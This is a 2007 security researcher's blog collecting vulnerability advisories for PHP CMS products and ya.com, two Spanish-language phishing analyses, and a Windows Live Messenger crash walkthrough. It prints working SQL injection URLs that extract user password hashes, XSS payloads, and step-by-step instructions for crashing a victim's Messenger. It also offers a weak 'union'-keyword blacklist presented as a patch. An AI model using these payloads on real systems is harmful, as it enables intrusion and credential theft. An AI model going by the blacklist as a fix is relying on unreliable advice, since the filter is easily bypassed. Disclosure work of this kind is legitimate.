XSS Flaw & posible SQL injection in search.php in PHCDownload

Friday, December 28, 2007
###############################################
XSS Flaw & posible SQL injection in PHCDownload
vendor url: http://www.phpcredo.com/
Advisore: http://lostmon.blogspot.com/2007/12/
xss-flaw-posible-sql-injection-in.html
vendor notify:YES exploit available: YES
###############################################

New XSS Flaw & posible SQL injection in search.php

PHCDownload contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate 'string' variable upon submission to 'search.php'
script.

This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.

verions:

1.1.0 afected.

example :

we can try inject some normal html or javascript code:

Code:

"><h1><a href="http://lostmon.blogspot.com">Lostmon</a> Was Here !!!</h1><br><h1>XSS Pow@ !!!</h1><p><iframe src="http://lostmon.blogspot.com"></iframe></p>

or inject directly the code in hex values :

Code:

%22%3E%3C%68%31%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%3C%2F%61%3E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%62%72%3E%3C%68%31%3E%58%53%53%20%50%6F%77%40%20%21%21%21%3C%2F%68%31%3E%3C%70%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
example in hex:

http://localhost/phcdownload/search.php?string=[XSS-CODE]

also this variable is prone vulnerable too to SQL injections.

if we look the source code of search.php arround line 36 we have :

Code:
// Prepare search query
if( $kernel->config['archive_search_mode'] == 1 )
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' IN BOOLEAN MODE )";
}
else
{
$search_syntax = "MATCH( f.file_name, f.file_description, f.file_version, f.file_author ) AGAINST ( '*{$kernel->vars['string']}*' )";
}
the value of 'string' is inserted directly in the sql query and this could be dangerous...

we can try to disclose the query :

http://localhost/phcdownload/upload/search.php?string='

i make several probes , but i don´t have found a working exploit or a
exploitable angle to this issue , but ...need to be patch

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

E-xoops multiple variable/scripts SQL injection

Sunday, December 09, 2007
############################################
E-xoops multiple variable/scripts SQL injection
vendor url: http://www.e-xoops.com
Advisore: http://lostmon.blogspot.com/2007/12/
e-xoops-multiple-variablescripts-sql.html
vendor notify:NO exploits available: YES
############################################



E-xoops is content-community management system written in PHP-MySQL.

E-xoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid','bid' and
'gid' variable, multiple script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.



#################
Versions:
#################

E-Xoops 1.08
E-Xoops 1.05 Rev3
E-Xoops 1.05 Rev2
E-Xoops 1.05 Rev1

and posible early versions.

#################
Solution:
#################

no solution available at this time
Try to edit the source code.
you can look this post in my group
to patch E-xoops ,because the source
code is veeeery similar to bcoos cms

http://groups.google.com/group/lostmon/
browse_thread/thread/59f3b836fad5b009

and here you have a src reference for
E-xoops 1.0.8 http://phpxref.com/xref/exoops/nav.html

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:--------
vendor response:-------
disclosure:09-12-2007


#################
SQL intections:
#################


http://localhost/e-xoops/modules/mylinks/
ratelink.php?lid=-1%20UNION%20SELECT%20pass
%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/adresses/
ratefile.php?lid=-1%20UNION%20SELECT%20pass
%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mydownloads/
ratefile.php?lid=-1%20UNION%20SELECT%20pass
%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/mysections/
ratefile.php?lid=-1%20UNION%20SELECT%20pass
%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/myalbum/
ratephoto.php?lid=-1%20UNION%20SELECT%20pass
%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/banners/
click.php?op=click&bid=-1%20UNION%20SELECT
%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/
index.php?act=show_stats&gid=-1%20UNION%
20SELECT%20pass%20FROM%20e_xoops_users%20LIMIT%201

http://localhost/e-xoops/modules/arcade/index.php?
act=play_game&gid=-1%20UNION%20SELECT%20pass%20FROM
%20e_xoops_users%20LIMIT%201


#################### €nd ########################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Posible patch for SQL Injections In bcoos 1.0.10

Sunday, December 02, 2007
############################################
Posible patch for SQL Injections In bcoos 1.0.10
vendor url:http://www.bccos.net
Patch by Lostmon. (lostmon@gmail.com)
Original article:http://lostmon.blogspot.com
/2007/12/posible-patch-for-sql-injections-in.html
############################################

in the last week some researchers and me have found multiple
critical SQL injections in bcoos 1.0.10 and prior versions.

After a simple study/look of the source code of product
i have found a simple patch , this is not a oficial patch but it
still working fine ,before the vendor release a oficial patch or
a new release.

You can use this modification as a solution to mitigate all
SQL injections , only need to detect 'union' sql command.


##########################
Sample code
##########################
you need to add this code to all afected files ...


if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

###########################
patch mylinks/ratelink.php
############################

open ratelink.php and arround line 73 you have a 'else' like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/mylinks/ratelink.php?lid=
-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch adresses/ratefile.php
##############################

open ratefile.php and arround line 70 you have a else like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###############################
patch mysections/ratefile.php
##############################

open ratefile.php and arround line 77 you have a else like } else {

put the code just before the else condition like :

}
if (eregi("%20union%20", $lid) ||eregi(" union ", $lid) || eregi("\*union\*", $lid) || eregi("\+union\+", $lid) || eregi("\*", $lid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}
else {

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/mysections/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

############################
patch banners/click.php
############################

open click.php and arround line 5 you have $bid = $_GET['bid'];

put the code just after the this line :

if (eregi("%20union%20", $bid) ||eregi(" union ", $bid) || eregi("\*union\*", $bid) || eregi("\+union\+", $bid) || eregi("\*", $bid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

save and close the file and now it´s pached
try to exploit for verify :

http://localhost/bcoops/modules/banners/click.php?
bid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

###########################
patch arcade/index.php
############################


open index.php and arround line 15 you have a switch($act)


put the code just before the switch


if (eregi("%20union%20", $gid) ||eregi(" union ", $gid) ||
eregi("\*union\*", $gid) || eregi("\+union\+", $gid) || eregi("\*",
$gid))
{
echo "<br /><br /><div style=\"text-align: center;\"><big>This SQL injection is patched Now !!!</big></div><br /><br />";
redirect_header("index.php");
die();
}

you can patch all of the rate files with the same code, because
for rating the code and funcions are similars in diferent modules.

###################-€nd-#######################

thnx to estrella to be my ligth.
thnx to all Lostmon Group Team !!
Thnx To All OSVDB manglers !!! Waiting for OSVDB 2.0 !!!
Thnx To orinico i know how can i do :D

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bcoops adresses/ratefile.php lid variable SQL injection

Friday, November 30, 2007
########################################################
Bcoops adresses/ratefile.php lid variable SQL injection
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-adressesratefilephp-lid-variable.html
vendor notify:NO exploits available: YES
########################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the script not
properly sanitizing user-supplied input to the 'lid' variable,
and adresses/ratefile.php script.This may allow an attacker to
inject or manipulate SQL queries in the backend database.



#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!
Try to edit the source code
or Try another product

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:--------
vendor response:-------
disclosure:30-11-2007


#################
SQL intections:
#################


http://localhost/bcoops/modules/adresses/ratefile.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201



####################### €nd ##############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Bcoops SQL injection and Cross-site scripting

Wednesday, November 28, 2007
####################################################
Bcoops SQL injection and Cross-site scripting
vendor url: http://www.bcoops.net
Advisore: http://lostmon.blogspot.com/2007/11/
bcoops-sql-injection-and-cross-site.html
vendor notify:YES exploits available: YES
####################################################



bcoos is content-community management system written in PHP-MySQL.

bcoops contains a flaw that may allow an attacker to carry out
an SQL injection attack. The issue is due to the arcade/index.php
script not properly sanitizing user-supplied input to the 'gid'
variable,and myalbum/ratephoto.php script and 'lid' variable are
afected by the same flaw This may allow an attacker to inject or
manipulate SQL queries in the backend database.



bccops contains too a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate the
'day' and 'year' variable upon submission to modules/theecal/display.php
script. This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the trust
relationship between the browser and the server, leading to
a loss of integrity


#################
Versions:
#################

bcoops 1.0.10 =< vulnerable

#################
Solution:
#################

No solution at this time !!!

#################
Timeline:
#################

Discovered:25-11-2007
vendor notify:27-11-2007
vendor response:-------
disclosure:28-11-2007


#################
SQL intections:
#################

http://localhost/modules/arcade/index.php?act=show_stats
&gid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/myalbum/ratephoto.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201

http://localhost/modules/mylinks/ratelink.php?
lid=-1%20UNION%20SELECT%20pass%20FROM%20bcoos_users%20LIMIT%201


#####################
Cross-site Scripting
#####################


http://localhost/modules/ecal/display.php?
day=17&month=11&year=2007"><script>alert()</script>


http://localhost/modules/ecal/display.php?
day=1"><script>alert()</script>&month=11&year=2007



####################### €nd ############################



Thnx to estrella to be my ligth
Thnx To FalconDeOro for his support
Thnx To Imydes From http://www.imydes.com

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Primer Phisihng sobre Google Checkout

Thursday, October 25, 2007
######################################################
Primer Phishing Sobre Google Checkout
Vendor url:http://checkout.google.com/
original article:http://lostmon.blogspot.com/2007/10/
primer-phishing-sobre-google-checkout.html
#######################################################


Google Checkout es uno mas de los servicios de Google,
el cual permite buscar y comprar con google, atraves
de compradores y vendedores en un sistema analogo o
parecido al de ebay o algunos otros.

Tanto para comprar como para vender se necesita una
cuenta de google y ademas varios datos bancarios como
como son una targeta de credito.


Hoy me llego un correo en el cual se me instaba a verificar
mi cuenta de Gmail.

[imagen correo]



Mirando bien parte de las cabeceras del Email enseguida vemos
que su procedencia es ilegitima :

Received-SPF: neutral (google.com: 194.100.2.122 is neither
permitted nor denied by best guess record for domain of
anonymous@tarmo.citius.info) client-ip=194.100.2.122;

Authentication-Results: mx.google.com; spf=neutral
(google.com: 194.100.2.122 is neither permitted nor denied
by best guess record for domain of anonymous@tarmo.citius.info)
smtp.mail=anonymous@tarmo.citius.info
Received: from
tarmo.citius.info (unknown [62.237.50.26])



Despues de seguir el link hacia el cual lleva esta estafa,
veo que en lugar de ir como se supone a un intento de robo
de contraseñas , lleva directamente a Google Checkout , lo
cual creo que es el primer Phishing dirijido hacia un
servicio de Google , ya que al intentar robar el numero de
targeta de credito , o bien en si dinero puede entonces
considerarse Phishing y no un simple Scam.

[foto del Scam]



Si nos fijamos bien en la url del engaño vemos varias cosas

1- se ha intentado imitar el dominio de Gmail atraves de un
subdominio que nada tiene que ver con Gmail.
2- Se ha intentado imitado la url de Gmail añadiendo varias
variables como la de 'Auth'
3- La url directa del mail en si no funciona pues se han
descuidado de poner '?' para que la url funcione directamente.
4- se puede entrar directamente al engaño en el raiz del web.

http://www.gmail.com.update.digitalwestex.org/auth=DQAAAHIAAAA
PQ-JRZfCChKlJsPpjaMLWnBzKRWEZQ02EbWrMJOO3uhnTGKoqpILRxFd_k0EdD
8g6a6dANfaOogLt1fjcqR0JYdy4mGaSf8R6XjoZXrHiiHXeDk8h93nAKGZBhZb
mpHOYevyYbPCp52S3Mz4y8EAtWF5o7-QGpnluuZvu1h11Lw&shva=0.html

Como siempre , no se porque nos Phishers no se esmeran y
dejan como siempre el directorio donde se guardan los archivos
al descubierto...


http://www.gmail.com.update.digitalwestex.org/
Welcome to Google Checkout!_fichiers/

[foto del directorio]



En el directorio en si encontramos varios archivos javascript,

1- 112228238-addressjs.js
2- creditcard.js
3- ukcreditcard.js
4- XmlHttp.js
5- TimeZones.js

Los cuales sin especificar, entre otras cosas se encargan de
gestionar de donde venimos, si hemos clicado en el enlace del
email,cacheara nuestra sesion y ademas intentara interceptar
varias de las acciones que tomemos despues de visitar la pagina
entre ellas validar si es correco el numero de targeta introducido.

El interesante en si es 112228238-addressjs.js :)

Si miramos el codigo fuente de la pagina vemos ademas que si
introducimos datos en el formulario del engaño estos aparte
ser cacheados ,se crea una cuenta nueva de Google Checkout.

Recordad que hace poco fue descubierta una nueva vulnerabilidad
sobre Google Gmail , la cual permite interactuar y establecer
filtrosen nuestro correo , con lo cual atraves de un scam malicioso
ademas de crear una cuenta en Checkout , podria en Gmail redirijir
los mensajes a otra cuenta sin conocimiento del usuario victima.

[referencia vulnerabilidad]
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/

recomiendo ,aparte de como siempre no fiarnos de este tipo de
correos y de comprobar que el sitio que se visita es realmente
el sitio lejitimo,aparte de las medidas habituales , si usais
explorer con la barra de google cerrar siempre la sesion en el
navegador(el boton verde) antes de navegar a otro sitio y si
usais firefox o otros navegadores , cerrar la sesion con el
link de la web logout, asi evitaremos la muchas de las
posibilidades de intentar hacerse con nuestra sesion.


Gracias a Imydes de www.imydes.com por su soporte.
Gracias a FalconDeOro por su paciencia.

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

Robo de contraseñas mediante un Scam de Google Gmail

Thursday, October 04, 2007
#####################################################
Robo de contraseñas mediante un Scam de Google Gmail
Robo de contraseñas mediante phishing en E-bullion
Descubridores e investigadores: Lostmon(1) Imydes(2)
Articulo original: http://www.imydes.com/?p=117
Fecha: 03/10/2007
####################################################

Este articulo procede de un trabajo conjunto con
Imydes la direccion del Articulo original: http://www.imydes.com/?p=117

--
Como seguramente todos sabreis, Google tiene bastantes
servicios a sus espaldas, por citar algunos:
Google Adsense, Google Docs, Gmail, Blogger, Picassa…

Mediante este Scam de Gmail Accounts cuyo objetivo es
robar la contraseña del internauta despistado podría
dar acceso a todos estos servicios de oogle mencionados.

El Scam en cuestión consiste en simular un formulario
de Google cuyo título es “My Account” simulando ser un
gestor para editar información personal de la cuenta de
Google.

En el formulario en cuestión encontramos los siguientes campos:

Username
Password
First name
Last name
Nick name
Zip code
Country

(Una pequeña nota, el usuario intermedio si pica por primera
vez podrá ver un pequeño fallo y es que el campo Password no
está protegido por **** y sale la contraseña a simple vista
y en el campo Country sale un desplegable con varios paises
y al no estar codificado con UTF-8 salen con “carácteres extraños”)

Gmail Accounts Scam Imydes

Si llenamos los campos antes nombrados y le damos a “Save”,
veremos que nos direcciona hacia “update.php” donde seguramente
se almacene la información introducida en el formulario desconozco
si es en BBDD o en un fichero).

Por otra parte, si entramos en la web directamente sin poner
www veremos que los creadores del Scam se han olvidado de
poner una página inicial para que no puedas ver el contenido
del servidor raiz.

En este descuido podemos ver un sistema para enviar e-mails
masivos del Scam (concretamente la dirección web es esta: http://us-gmail.com/mail.php).

También podemos ver una página web que seguramente sigue la
misma dinámica que el Scam de Gmail pero es con e-Bullion
(web http://us-gmail.com/e-lbullion/). Podemos ver que en
el caso de e-bullion se dirige a “/secure/update.php”.

E-bullion Phishing

Créditos:

Imydes (Documentación del Scam e investigación)(www.imydes.com)
Lostmon (El descubridor de este Scam e investigación) (http://lostmon.blogspot.com)
Lostmon Group (http://groups.google.com/group/lostmon)

Gracias a XiuX, MARNI, itimad, Yeremat, Soed, Newcastle por confiar en mi.

Windows live Messenger malformed file overflow DoS remote exploitation.

Friday, September 21, 2007
##############################################################
Windows live Messenger malformed file overflow remote exploitation.
(windows ole32.dll ms07-024) (windows GDI MS07-046 )
vendor url: http://www.microsoft.com/ , http://get.live.com/messenger/overview
Advisore: http://lostmon.blogspot.com/2007/09/
windows-live-messenger-jpg-overflow.html
Vendor notify:YES Vendor Confirmed:yes(DoS issue) Explotation include:YES
BID:25795
#############################################################

A buffer overflow exists in Windows MSN Live. The GDI engine fails
to representate malformed data in image files resulting in a buffer
overflow. With a specially crafted jpg or wmf or gif file or doc
file or ico, an attacker can cause arbitrary code execution
(not Shure RCE) or a DoS resulting in a loss of integrity.

############
History
############

after install this patch for a vulnerability in windows GDI
MS07-046 i make several probes with some malformed image files
(jpj,gif,wmf,ico,doc) and i have the same result before i install
this patch and after install it :(

###############
versions tested
###############

All of this versions and Windows MSN live 8.1
I don´t know if other versions of windows are prone
vulnerables too , but i think that is vulnerable
all systems related in MS07-046 Microsoft Bulleting.

win xp media Center version 2002 service pack 2
Win XP pro
Win XP home

###############
Solution
###############
No solution was available at this time, but

DON´T SHARE ANY FOLDER IN MSN UTIL
HAVE A SOLUTION OR PATCH !!!!!!

The vendor planing address this issue
in the next service pack.

###############
Timeline
###############

Discovered:20-08-2007
Vendor initial contact:23-08-2007
Vendor response:24-08-2007
Vendor patch:---
Private disclosure:17-09-2007
Public disclosure:

##############
Impact
##############

A remote user can cause a DoS in the aplication.
If the patch for windows meta files (wmf) does not
work correctly , a remote user can execute arbitrari code
but i´m not shure if the RCE can be done.


##########################
Explanation Step By Step
##########################

What we need??

- Two machines with windows msn live 8.1 and with
- Two of the systems related in versions section.
- A malformed image like jpg,gif, or wmf.

Machine 1 => msn 8.1 & windows xp media center 2002 all fully patched.[victim´s]
Machine 2 => msn 81. & windows xp home all fully patched.[evil_attack]

In windows msn 8.1 we have a option to share folders with others contacts.
The first time wen you share a folder with a contact msn ask for sharing,
if you accept the folder is automatic sharing all times.

To look the folder location you can go to my computer/msn
folders/[VICTIM´S]@hotmail.com

and the fisical path is:

C:\Documents and Settings\[YOUR_USER]\Configuración local\
Datos de programa\Microsoft\Messenger\[ATTACKER]@hotmail.com\
Sharing Folders\[VICTIM´S]@hotmail.com

1 - login in msn in the two machines.
2 - machine 2 open a conversation window with machine 1
3 - Machine 2 click in the incon to share a folder.
4 - Mahine 1 accept to share.
5 - put in machine 1 in the share folder a new folder and inside it a
malformed jpg file; but not by msn go to fisicall path and put there ,
because if you drag&drop the image to share folder inside msn,The aplication crash.

6 - close in all machines the share folder.

now you have in the machine 1 in the fisical path for the share folder
a folder with a malformed image.

7 - in machine 2 click in the icon to share and wen msn in machine 1
look for open and send the list of files inside the MSN in the
machine 1 Crash , and if you don´t terminate the proccess
crashing windows too with a Blue screen of death :S

Now you can crash the MSN in the victim´s machine all times wen click
in the icon to share.
The victim need to delete this folder for stop this situation.

OK think moore we need to put a image in the machine victim´s.

Can we put it with no interaction of the victims?...yes
the victim oly need to make one click. :)

if we have a share folder with the victim, and victim and attacker are online...
the victim can put in his local share folder a new folder with the
malformed image,
and in the attacker conversation window apears a new Message what say...

The victim has add files to share folder would do you like to
sincronice or update ?? ...or some similar...

if the attacker click on yes... the MSN on the attacker machine is Crasing.
and now the victim can crash Victim´s MSN all times .
The attacker need to delete de folder with the evil jpg.

i have a eassier way to exploit and/or manipulate the malformed file:

1 share a folder with a contact in msn.
2 close in msn the share folder.
3 open a cmd and go to the fisical path of the share folder.
4 generate the malformed file by perl python or similar.

if the file is generated and you have open a conversation window with
the victim, your msn say "all files are upload" wen your msn finish the
sincronization with the msn victim`s, and in the victim´s MSN say " the
user bla bla bla has update the sare folder" or some similar.

Now the exploit is in your machine and in the machine´s victim.

if you clik on share folder icon, and if you have the exploit in your
machine wen you clik
your MSN crashing , but if you after sincronization, you delete in
your local folder the malformed file... wen you clik in share folder.
wen MSN try to sincronize the share folder in victim´s machine with
your share folder. the MSN on the machine´s victim is crashing.

i think that some of this issues in malformed files...
comming from the extended file attributes.

if any like to profundice on it, here you have two related interesting articles:

First part:

http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html

Second part :

http://lostmon.blogspot.com/2007/08/windows-extended-file-attributes-buffer.html

and the related Microsoft bulletins:

Vulnerability in ole32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-024.mspx

Vulnerability in gdi32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx



########################## €nd #####################

Thnx to extrella to be my ligth.
Thnx to Dave from securiy center for his patience.
Thnx to FalconDeOro ( la paciencia, es una virtud, pequeño Jedy)
Thnx to All Lostmon Group Team.
Thnx to N0xTrUm from N0xTrUm Tecnologies http://n0xtrum.blogspot.com/
Thnx To ANELKAOS from http://www.elhacker.net/ for his support.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

LINPHA 1.3.1 Multiple Scripts XSS

Friday, September 07, 2007
##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url:http://linpha.sourceforge.net
Advisore:http://lostmon.blogspot.com/2007/09/
linpha-131-multiple-scripts-xss.html
vendor informed:NO exploit available:YES
##########################################


LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures


LinPHA contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.


################
Versions
################

LinPHA 1.3.1

################
Timeline
################

Discovered:05-08-2007
disclosure:07-09-2007

###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?
imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600

http://localhost/linpha/search.php?1=1&pn=2
"><script>alert()</script>#tn

http://localhost/linpha/viewer.php?album=etc/passwd">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&order=">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha//search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?search_text=a&order=">
<body><script>alert()</script><h1>lalala</h1></body>

Some other params and scripts are afected...

###################### €nd ###############################

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Ya.com sufre agujeros de tipo XSS

Thursday, August 30, 2007
###################################
Ya.com sufre agujeros de tipo XSS
###################################

La web de Ya.com esta afectada por vulnerabilidades
de tipo cross-site scripting.

Los agjeros se hayan localizados bajo el subdonimio
acceso.ya.com y asi mismo sobre corp.ya.com

Aparte de los aqui mencionados a modo de prueba de
concepto existen algunos mas en algunas otras zonas
dinamicas del portal.

Tras haber intentado en varias ocasiones contactar
con ya.com , en principio ha sido imposible ya que
en su web la una forma de contacto con ellos es
telefonica, y yo no estoy dispuesto a gastarme
mi dinero para reportar fallos en su web;asi pues
me he visto obligado a mandar correos al tum tum
a seguridad, security etc etc @ya.com para ver si
por suerte alguno existia o no ,lo cual veo que no
al no obtener respuesta , o bien simplemente pasan...

Algunos ejemplos de esta explotacion:

https://acceso.ya.com/ayuda/searchfunc.html?si=html
&co=20&sw=[XSS-CODE]&Submit=Buscar


http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas

http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]

##################### €nd ###########################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Windows Extended file attributes buffer overflow Study II

Thursday, August 09, 2007
##########################################################
Windows Extended file attributes buffer overflow Study II
Original:
##########################################################

In a previous article , i write about extended file
attributes:

"A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size
of the buffer in 'FileAllInformation(),FileNameInformation'
and other subfunctions in Undocumented functions of NTDLL ,
resulting in a buffer overflow. With a unknow impact."

Original article:

http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html

I Write "this issue could be done in all files"...

Now i go to extend some details moore of my investigation
and the research of this issue.

Look the new vulnerabilities on Microsoft windows GDI and ole32

http://www.securityfocus.com/bid/16167
http://www.securityfocus.com/bid/25207
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887

All PoC and all exploits have some details to study.

All files wen explorer crash ,crashing wen try to look
the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)
How to demostrate it ??

All exploits have some similitudes ....
all crafted files crashing at the same point or at the same properties
this is a litle test/study of those exploits / vulnerabilities


############################################
Testing with filemon and EFA.vbs
############################################


####################
Exploit wmf File
####################

Download BID 16167 exploit and unzip it in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the wmf
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

####################
Exploit jpg file
####################

Download BID 25207 exploit and unzip it in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the jpg
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

###################
exploit Gif file
###################

save exploit for Gif file in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the gif
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

###################
Exploit Doc file
###################

unzip the explorer_crasher.doc in c:\test\
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the doc
file , crash , or wen put the mouse over...

in the filemon wen the crash is done filemon mark the
overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)
#################################
LINKS AND FILES NEEDED
#################################

For testing this you need all exploits , filemon and EFA.vbs.

Download filemon :

